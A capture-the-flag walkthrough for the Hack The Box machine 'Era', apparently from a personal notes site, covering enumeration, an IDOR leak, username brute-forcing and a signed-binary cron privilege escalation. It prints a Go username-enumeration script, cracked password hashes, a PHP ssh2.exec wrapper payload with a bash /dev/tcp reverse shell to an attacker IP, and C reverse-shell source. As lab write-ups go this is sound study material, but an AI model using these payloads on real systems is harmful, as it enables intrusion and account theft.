Era (HTB)

into

Hello hackers. New HTB machine season machine. New as in the day of release lets get right into it.

enumeration

Port scanning

# Nmap 7.97 scan initiated Fri Aug 22 18:25:56 2025 as: nmap -vvv -p 21,80 -4 -Pn -sC -sV -vv -o nmap.scan 10.10.11.79
Nmap scan report for era.htb (10.10.11.79)
Host is up, received user-set (0.011s latency).
Scanned at 2025-08-22 18:25:56 +08 for 11s

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.5
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Era Designs
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 0309B7B14DF62A797B431119ADB37B14
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 22 18:26:07 2025 -- 1 IP address (1 host up) scanned in 10.67 seconds

This is odd. FTP, HTTP. let's see what we have

Web server enumeration.

As for the normal domain era.htb it does not have anything only static page. After performing subdomain enumeration using ffuf we can find a new subdomain called file .

Adding that to the hosts file. /etc/hosts we can navigate there to see few options.

All of them require login but there is no registration page. Enumerting the directoires going to show us some interesting ones.

~/Documents/era on   (us-west-2)
❯ dirsearch -u http://file.era.htb/
/usr/share/dirsearch/lib/core/installation.py:24: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12292

Target: http://file.era.htb/

[18:34:47] Scanning:
[18:34:50] 403 -   564B - /admin/.htaccess
[18:34:52] 403 -   564B - /administrator/.htaccess
[18:34:52] 403 -   564B - /app/.htaccess
[18:34:52] 301 -   178B - /assets  ->  http://file.era.htb/assets/
[18:34:52] 403 -   564B - /assets/
[18:34:54] 302 -     0B - /download.php  ->  login.php
[18:34:54] 301 -   178B - /files  ->  http://file.era.htb/files/
[18:34:54] 403 -   564B - /files/
[18:34:54] 403 -   564B - /files/cache/
[18:34:54] 403 -   564B - /files/tmp/
[18:34:55] 301 -   178B - /images  ->  http://file.era.htb/images/
[18:34:55] 403 -   564B - /images/
[18:34:55] 200 -   34KB - /LICENSE
[18:34:55] 200 -    9KB - /login.php
[18:34:56] 200 -    70B - /logout.php
[18:34:56] 302 -     0B - /manage.php  ->  login.php
[18:34:58] 200 -    3KB - /register.php
[18:34:59] 302 -     0B - /upload.php  ->  login.php

we can see register.php naviagating there we will find the register page. after register it going to redirect us to the login page, and after that we can login into the system.

After playing around i found that when we upload a file and access it, it uses the id to access it. Maybe IDOR ?.

using caido i was able to find few. But the interesting one is 150 ID.

accessing there we going to file a zip file called signing.zip unzip it, to find certification (x509) and private key..

The unzip file contains the following files.

───────┬────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: x509.genkey
───────┼────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ [ req ]
   2   │ default_bits = 2048
   3   │ distinguished_name = req_distinguished_name
   4   │ prompt = no
   5   │ string_mask = utf8only
   6   │ x509_extensions = myexts
   7   │
   8   │ [ req_distinguished_name ]
   9   │ O = Era Inc.
  10   │ CN = ELF verification
  11   │ emailAddress = yurivich@era.com
  12   │
  13   │ [ myexts ]
  14   │ basicConstraints=critical,CA:FALSE
  15   │ keyUsage=digitalSignature
  16   │ subjectKeyIdentifier=hash
  17   │ authorityKeyIdentifier=keyid

and another private key which is not protected. For now this does not do a whole a lot. But there is more.

finding more users.

So there is a big mistake here, First from the image above we can see that we can login using the security question, but the problem lies in how the server is able to find the user, when we provide a wrong username then we going to know that the username is wrong, and if it valid we going to know too. We can use that to our advantages to extract more users. I wrote this simple go code which enable you to dictionary attack that form to extract users.

package main

import (
	"bufio"
	"io"
	"log"
	"net/http"
	"net/url"
	"os"
	"strings"
	"sync"
)

// http://file.era.htb/security_login.php

func send(users chan string, wg *sync.WaitGroup) {
	for user := range users {

		body := url.Values{}
		body.Add("username", user)
		body.Add("answer1", "a")
		body.Add("answer2", "a")
		body.Add("answer3", "a")

		res, err := http.PostForm("http://file.era.htb/security_login.php", body)
		if err != nil {
			log.Printf("Error sending the request :%s\n", err)
		}
		defer res.Body.Close()
		reader, err := io.ReadAll(res.Body)
		if err != nil {
			log.Print("error reading the body\n")
		}
		if !strings.Contains(string(reader), "User not found.") {
			log.Println("valid user found: ", user)
		}

		wg.Done()
	}
}
func main() {

	// you can change this to match your username file
	file, err := os.Open("./usernames.txt")
	var wg sync.WaitGroup
	
	// and the size here for the goroutins that going to run.
	users := make(chan string, 100)

	for i := 0; i < cap(users); i++ {
		go send(users, &wg)
	}

	if err != nil {
		log.Fatal("Error opening file, ", err)
	}

	scanner := bufio.NewScanner(file)
	for scanner.Scan() {
		line := scanner.Text()
		wg.Add(1)
		users <- line
	}
	wg.Wait()
}

After running this script i found these usernames.

Documents/era/bruter via  v1.24.6 on   (us-west-2)
❯ go run .
2025/08/22 19:14:46 valid user found:  eric
2025/08/22 19:15:03 valid user found:  john
2025/08/22 19:15:10 valid user found:  maladminister
2025/08/22 19:15:10 valid user found:  malan
2025/08/22 19:15:10 valid user found:  malarkey
2025/08/22 19:15:10 valid user found:  maladapted
2025/08/22 19:15:10 valid user found:  maladjustment
2025/08/22 19:15:10 valid user found:  maladroit
2025/08/22 19:15:10 valid user found:  maladjusted
2025/08/22 19:15:10 valid user found:  malady
2025/08/22 19:15:10 valid user found:  malagasy
2025/08/22 19:15:40 valid user found:  test
2025/08/22 19:15:45 valid user found:  veronica
2025/08/22 19:15:49 valid user found:  yuri

among these user names the yuri user is the most interesting user as we can see from the certification file above that it matches the name yurivich@era.com using hydra i was able to find the password for the user yuri for the ftp server.

username: yuri
password: mustang

after finding these credential i was able to login into the ftp server but there was nothing so i was looking back and forth of my findings and i found that as showen the caido image there is another id which i did not check 54 when i came back to it, it was a zip file that contains a backup version of the site so a very big this i was missing :(

The most important thing is the db file init we can find more users and most important the admin..

using hash cat also i was able to crack two password of these which is for yuri which we already know and eric .

(eric)$2y$10$S9EOSDqF1RzNUvyVj7OtJ.mskgP1spN3g2dneU.D.ABQLhSV2Qvxm:america
(yuri)$2b$12$HkRKUdjjOdf2WuTXovkHIOXwVDfSrgCqqHPpE37uWejRqUWqwEL2.:mustana

going more into the code we can see that the file download.php contains something intresting.

This is very interesting it uses streaming here to it possible to execute php wrappers. But it require admin access. we can simply use the reset security question reset to access it . After that we can try php wrappers. i tried the ssh2.exec and it actually work. This attempts to execute some command via ssh session on the local machine.

I used this payload.

ssh2.exec://yuri:mustang@127.0.0.1/bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.111%2F8899%200%3E%261%27%23

and this is the whole get command

GET /download.php?id=54&show=true&format=ssh2.exec://yuri:mustang@127.0.0.1/bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.111%2F8899%200%3E%261%27%23

Do not forgot to set the listner nc -nvlp 8899 .

After this we already know eric password we can switch to him directly.

root.

After we access eric we can see that we are in a group called devs. searching for files belongs to that group. using find

find / -group devs 2>/dev/null

We going to see these files also we have write access on monitor . At first glance you may say this is easy just change that monitor file to something malicious and execute it. RIGHT?. This is completely correct by if we do so we will see this message.

So before it executed it, it checks for the signature and if it valid it will execute it other wise it won't. Also this is a cron job from root will be executed every once and while. If i had to guess the useless key we find earlier is the one used for singing. So let's test that assumption.

wrong way.

After spending some time failing the way i was doing was wrong i was taking the while key.pem file which include the private key and the certificate both in one file. so i was using openssl to generate the signature.

openssl dgst -sha256 -sign ./key.pem -out elf.sign ./monitor_not

where the monitor_not is this code.

#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
// Put your IP.
    char *attacker = "X.X.X.X";
    struct sockaddr_in attacker_info;
    socklen_t len = sizeof(attacker_info);
    int status;
    int fd = socket(AF_INET, SOCK_STREAM, 0);

    attacker_info.sin_port = htons(4949);
    attacker_info.sin_family = AF_INET;
    attacker_info.sin_addr.s_addr = inet_addr(attacker);
    memset(&attacker_info.sin_zero, 0, sizeof(attacker_info.sin_zero));

    if ((status = connect(fd, (struct sockaddr *)&attacker_info, len)) == -1) {
        return 1;
    }

    for (size_t i = 0; i < 3; i++) {
        dup2(fd, i);
    }

    char *const argvv[] = {"sh", NULL};
    execvp("sh", argvv);
}

When compiling the code above do not forgot to use the -static when compile to make sure no dynamic linking is needed.

So i was generating signature without problems. and using the objcopy i put the signature as section in the elf executable.

objcopy \
  --add-section .text_sig=elf.sign \
  --set-section-flags .text_sig=noload \
  monitor_not \
  monitor.signed -> !! new executable here

so the command above going to insert the signature into a section called text_sig . And that file should be the one that produce a valid signature when it executed. Anyway this is not the case this was producing invalid signature.

Correct way..

Am not sure if there is a way to complete it in openssl but when i searched about this i came across this github repo which include a tool used to provide the same thing adding a sign to a elf executable.

GitHub - NUAA-WatchDog/linux-elf-binary-signer: ✒️ Adding digital signature into ELF binary files.GitHub

After compiling it using this command

gcc elf_sign.c -lcrypto -o singer

we can use it to produce a sign elf .

Also do not forgot to split the keys into the key.pem into two sperate files.

./singer sha256 ./signing_key.pem ./signing_cert.pem monitor monitor_signed

So this going to take an algorithm private key and certificate. the last two is the executable name in this case mine was monitor and the output name monitor_signed. After it finish executing. we can run a python server to transfer the executable.

python3 -m http.server <PORT>

And from the target machine using wget we can get the executable.

wget http://<IP>:<PORT>/<EXEC_NAME>

After downloading it into the machine run this command to make it executable.

chmod +x <EXEC_NAME>

And finally change its name to machine the target one executed by the root which is monitor

mv <EXEC_NAME> monitor

Also before all of that do not forgot to set the listner in your attacking machine.

nc -nlvp <PORT>

And once it execute by the cron job we shall receive the shell :)

Closing.

This machine was unique in its ideas and the way of ssh2.exec is amazing way and new thing to me. And the code signature was my first time dealing with such very interesting machine ...

PreviousCVE-2024-27198 NextOutBound (HTB)

Last updated 5 months ago

hashtaginto

hashtagenumeration

hashtagPort scanning

hashtagWeb server enumeration.

hashtagfinding more users.

hashtagroot.

hashtagwrong way.

hashtagCorrect way..

hashtagClosing.

into

enumeration

Port scanning

Web server enumeration.

finding more users.

root.

wrong way.

Correct way..

Closing.